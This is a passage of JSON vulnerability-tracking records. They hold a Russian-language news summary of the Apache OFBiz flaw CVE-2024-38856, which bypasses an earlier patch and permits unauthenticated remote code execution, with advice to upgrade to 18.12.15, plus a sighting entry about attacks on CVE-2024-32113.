\u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0435\u0442 \u043f\u0443\u0442\u044c \u0434\u043b\u044f RCE.\n\n\u041a\u0430\u043a \u043f\u043e\u044f\u0441\u043d\u044f\u044e\u0442 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438, CVE-2024-38856 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043e\u0431\u0445\u043e\u0434\u043e\u043c \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u0434\u0440\u0443\u0433\u043e\u0439 CVE-2024-36104, \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043e\u0431\u0445\u043e\u0434\u0430 \u043f\u0443\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0431\u044b\u043b\u0430 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430 \u0432 \u043d\u0430\u0447\u0430\u043b\u0435 \u0438\u044e\u043d\u044f \u0441 \u0432\u044b\u043f\u0443\u0441\u043a\u043e\u043c 18.12.14.\n\n\u041e\u0441\u043d\u043e\u0432\u043d\u0430\u044f \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u0444\u0443\u043d\u043a\u0446\u0438\u0435\u0439 \u043f\u0435\u0440\u0435\u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u0438\u044f \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0438\u044f, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0435\u0442 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u0430\u0436\u043d\u044b\u043c \u043a\u043e\u043d\u0435\u0447\u043d\u044b\u043c \u0442\u043e\u0447\u043a\u0430\u043c \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u043e\u0433\u0443\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0435\u0435 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u0445 \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432.\n\n\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u043d\u0430\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c \u0441\u0432\u043e\u0438 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u044b \u0434\u043e \u0432\u0435\u0440\u0441\u0438\u0438\u00a018.12.15\u00a0\u0438\u043b\u0438 \u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u0437\u0434\u043d\u0435\u0439, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 OFBiz \u0443\u0436\u0435 \u0431\u0435\u0437 \u0442\u043e\u0433\u043e \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u0432 \u043f\u043e\u043b\u0435 \u0437\u0440\u0435\u043d\u0438\u044f \u0445\u0430\u043a\u0435\u0440\u043e\u0432, \u0432 \u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435 \u043e\u043f\u0435\u0440\u0430\u0442\u043e\u0440\u043e\u0432 \u0431\u043e\u0442\u043d\u0435\u0442\u0430 Mirai, \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0449\u0438\u0445 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u0443\u044e CVE-2024-32113.", "creation_timestamp": "2024-08-07T11:58:50.000000Z"}, {"uuid": "9f1b67fe-ecfa-491f-b757-819a0f8764d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "seen", "source": "https://t.me/ctinow/221115", "content": "Increased Activity Against Apache OFBiz CVE-2024-32113, (Wed, Jul 31st)\nhttps://ift.tt/glFqA6d", "creation_timestamp": "2024-07-31T20:34:28.000000Z"}]}